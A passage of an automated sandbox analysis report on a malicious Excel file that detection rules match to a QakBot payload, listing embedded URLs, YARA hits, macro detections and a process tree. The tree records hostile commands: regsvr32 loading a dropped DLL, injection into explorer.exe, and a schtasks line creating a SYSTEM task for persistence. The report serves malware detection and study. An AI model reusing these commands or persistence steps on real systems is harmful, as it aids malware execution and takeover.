              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://officeapps.live.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://onedrive.live.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://onedrive.live.com/embed?
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://outlook.office.com/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://outlook.office365.com/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://pages.store.office.com/review/query
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://powerlift.acompli.net
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://settings.outlook.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://shell.suite.office.com:1443
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://skyapi.live.net/Activity/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://staging.cortana.ai
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://store.office.cn/addinstemplate
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://store.office.com/addinstemplate
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://store.office.de/addinstemplate
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://tasks.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://templatelogging.office.com/client/log
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://web.microsoftstream.com/video/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://webshell.suite.office.com
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://wus2.contentsync.
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://wus2.pagecontentsync.
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
              Source: 2931D31E-E476-4A7B-8B64-97D46D540C47.0.drString found in binary or memory: https://www.odwebp.svc.ms
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 43.225.55.182:443 -> 192.168.2.3:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 192.185.33.154:443 -> 192.168.2.3:49723 version: TLS 1.2

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: QakBot Payload Author: kevoreilly
              Source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: QakBot Payload Author: kevoreilly
              Source: 4.2.explorer.exe.f50000.0.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
              Source: 4.2.explorer.exe.f50000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
              Source: 3.2.regsvr32.exe.bd0000.2.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
              Source: 3.2.regsvr32.exe.bd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: Enable Content 14 15 16 17 .. . 18 WHY I CANNOT OPEN THIS DOCUMENT ? 19 20 21 W You are usin
              Found Excel 4.0 Macro with suspicious formulasShow sources
              Source: audit-1133808478.xlsbInitial sample: EXEC
              Found abnormal large hidden Excel 4.0 Macro sheetShow sources
              Source: audit-1133808478.xlsbInitial sample: Sheet size: 7504
              Office process drops PE fileShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htmJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\covi1.dll
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\DBGJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B32559
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B33CA2
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B31DFC
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B358C5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B3572B
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B35F18
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B3111C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B31000
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34706
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34A05
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B31F7B
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B33E7B
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F69850
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F6A41E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F6B00E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F6000A
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F52008
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F675E0
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F529CA
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F53988
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5D55B
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F66D40
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F6FE8F
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F6F66B
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F53A2E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5DE03
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F68A00
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F6D7E4
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5E355
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F6A718
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 652
              Source: covi1.dll.4.drStatic PE information: No import functions for PE file found
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
              Source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
              Source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
              Source: 4.2.explorer.exe.f50000.0.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
              Source: 4.2.explorer.exe.f50000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
              Source: 3.2.regsvr32.exe.bd0000.2.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
              Source: 3.2.regsvr32.exe.bd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@20/20@2/2
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F626A6 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
              Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{F4E1DB13-650B-4410-8E14-53724DEB3A20}
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess3056
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess3360
              Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{F4E1DB13-650B-4410-8E14-53724DEB3A20}
              Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{B7C66CEC-1556-41DB-98E9-9A9D57BAA138}
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C5F6F81E-1C14-4C4D-9C5D-E8BD652D8F75} - OProcSessId.datJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi1.dll
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi2.dll
              Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\covi1.dll'
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\covi1.dll'
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 652
              Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\covi1.dll'
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\covi1.dll'
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 652
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi1.dll
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi2.dll
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\covi1.dll'
              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\covi1.dll'
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: audit-1133808478.xlsbInitial sample: OLE zip file path = xl/media/image2.png
              Source: audit-1133808478.xlsbInitial sample: OLE zip file path = xl/media/image3.png
              Source: audit-1133808478.xlsbInitial sample: OLE zip file path = xl/media/image4.png
              Source: audit-1133808478.xlsbInitial sample: OLE zip file path = xl/media/image5.png
              Source: audit-1133808478.xlsbInitial sample: OLE zip file path = xl/media/image6.png
              Source: audit-1133808478.xlsbInitial sample: OLE zip file path = xl/media/image1.png
              Source: audit-1133808478.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_00F5F1CA LoadLibraryA,GetProcAddress,
              Source: covi1.dll.4.drStatic PE information: section name: .code
              Source: covi1.dll.4.drStatic PE information: section name: .rdataf
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\covi1.dll
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B348FB push 00000000h; mov dword ptr [esp], edx
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], ecx
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edi
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edi
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edi
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edi
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], esi
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push dword ptr [ebp-14h]; mov dword ptr [esp], eax
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00B34CC2 push 00000000h; mov dword ptr [esp], edx

              Persistence and Installation Behavior:

              barindex
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htmJump to dropped file
              Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\covi1.dllJump to dropped file
              Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\covi1.dllJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htmJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\covi1.dllJump to dropped file
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
              Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5828 base: 123F380 value: E9 6F 53 D1 FF
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
